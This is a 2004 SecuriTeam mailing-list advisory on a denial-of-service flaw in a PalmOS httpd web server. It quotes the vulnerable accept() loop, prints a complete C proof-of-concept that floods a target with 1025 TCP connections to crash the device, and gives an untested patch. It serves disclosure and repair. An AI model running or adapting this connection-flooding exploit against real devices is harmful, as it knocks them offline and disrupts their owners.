[NEWS] PalmOS httpd accept() Queue Overflow DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 02/11/04

  • Next message: SecuriTeam: "[NT] Microsoft ASN.1 Library Vulnerability Could Allow Code Execution (MS04-007)" 
    To: list@securiteam.com
Date: 11 Feb 2004 11:05:25 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      PalmOS httpd accept() Queue Overflow DoS
    ------------------------------------------------------------------------

    SUMMARY

    'httpd' for PalmOS was originally written by Jim Rees, it is a simple web
    server for Palm powered PDAs. The development of httpd for Palm stopped.
    Shaun Colley modified 'httpd' slightly, and re-released it on
    freshmeat.net. httpd contains a bug which causes the device to crash due
    to a "Fatal Error".

    DETAILS

    The bug allows an attacker to crash the entire device, causing a "Fatal
    Error", rendering the device unusable until it is reset completely. PalmOS
    can only handle1 client connection, but 'httpd' implements a while(1) loop
    to accept() connections forever. Because of this, httpd will accept more
    than 1 connection, which PalmOS literally cannot do. The result is a
    dialog box saying "Fatal Error, NetStack1.c overflowed accept queue",
    with a "Reset" button.

    Vulnerable Code:
    From httpd.c:
    [snip]
    while (1) { /* Cause of the bug is here! PalmOS can only accept 1 client
    connection! */
            if (f) {
                xclose(f);
                f = NULL;
            }
            if (fd >= 0) {
                close(fd);
                fd = -1;
            }
            /* Accept connections */
            len = sizeof saddr;
            AppNetTimeout = SysTicksPerSecond() * 1;
            if ((fd = accept(sfd, (struct sockaddr *)&saddr, &len)) < 0) {
    [snip]

    PoC:
    //palmslam.c
    /* PalmOS httpd accept queue overflow PoC exploit.
     * Compile: gcc palmslam.c -o palmslam
     *
     * -shaun2k2
     */
    #include < stdio.h>
    #include < stdlib.h>
    #include < sys/socket.h>
    #include < sys/types.h>
    #include < netdb.h>
    #include < netinet/in.h>
    #define MAX_CON 1025
    int main(int argc, char *argv[]) {
            if(argc < 3) {
                    printf("Usage: palmslam < host>< port>\n");
                    exit(-1);
            }
            int sock[MAX_CON];
            int i;
            struct sockaddr_in dest[MAX_CON];
            struct hostent *host;
            if((host = gethostbyname(argv[1])) == -1) {
                    printf("Couldn't resolve %s!\n",argv[1]);
                    exit(-1);
            }
            for(i = 0; i < = MAX_CON; i++) {
                    if((sock[i] = socket(AF_INET,SOCK_STREAM, 0)) == -1) {
                            printf("Couldn't createsocket!\n");
                            exit(-1);
                    }
                    dest[i].sin_family = AF_INET;
                    dest[i].sin_port =htons(atoi(argv[2]));
                    dest[i].sin_addr = *((struct in_addr*)host->h_addr);
                    if(connect(sock[i], (struct sockaddr*)&dest[i],
    sizeof(struct sockaddr)) == -1) {
                            printf("Couldn't connect to %son port %s!\n",
    argv[1], argv[2]);
                            exit(-1);
                    }
                    printf("%d : Connected!\n", i);
            }
            return(0);
    }

    Patch Availability:
    ---httpd.patch
    --- httpd.c 2004-01-14 17:21:41.000000000 +0000
    +++ httpd.1.c 2004-02-08 17:13:33.000000000 +0000
    @@ -391,8 +391,15 @@
         NetLibAddrINToA(AppNetRefnum,
    ifinfo.param.interfaceInfo.ipAddr, host);
         printf("Listening on %s\n", host);

    - while (1) {
    - if (f) {
    + /* Here is where the bug manifests: PalmOS can
    only take 1 client
    + * connection (according to even the PalmOS
    programming documentation),
    + * but this loop accept()s connections forever.
    The loop is now commented
    + * out, fixing the bug.
    + * -Shaun2k2
    + */
    +
    + /*while (1) {*/
    + if (f) {
                xclose(f);
                f = NULL;
            }
    @@ -507,7 +514,7 @@
         }

         printf("stopped\n");
    -}
    +/*}*/

     char html0[] = "HTTP/1.0 200 OK\nMIME-version: 1.0\nContent-type:
    %s\n\n"; 

    ---
To apply the patch run: patch httpd.c httpd.patch. Type 'make' to 
recompile httpd. Shaun Colley did not test the patch.
ADDITIONAL INFORMATION
The information has been provided by  <mailto:shaunige@yahoo.co.uk> Shaun 
Colley.
======================================== 
This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 
==================== 
==================== 
DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
  • Next message: SecuriTeam: "[NT] Microsoft ASN.1 Library Vulnerability Could Allow Code Execution (MS04-007)"

    Relevant Pages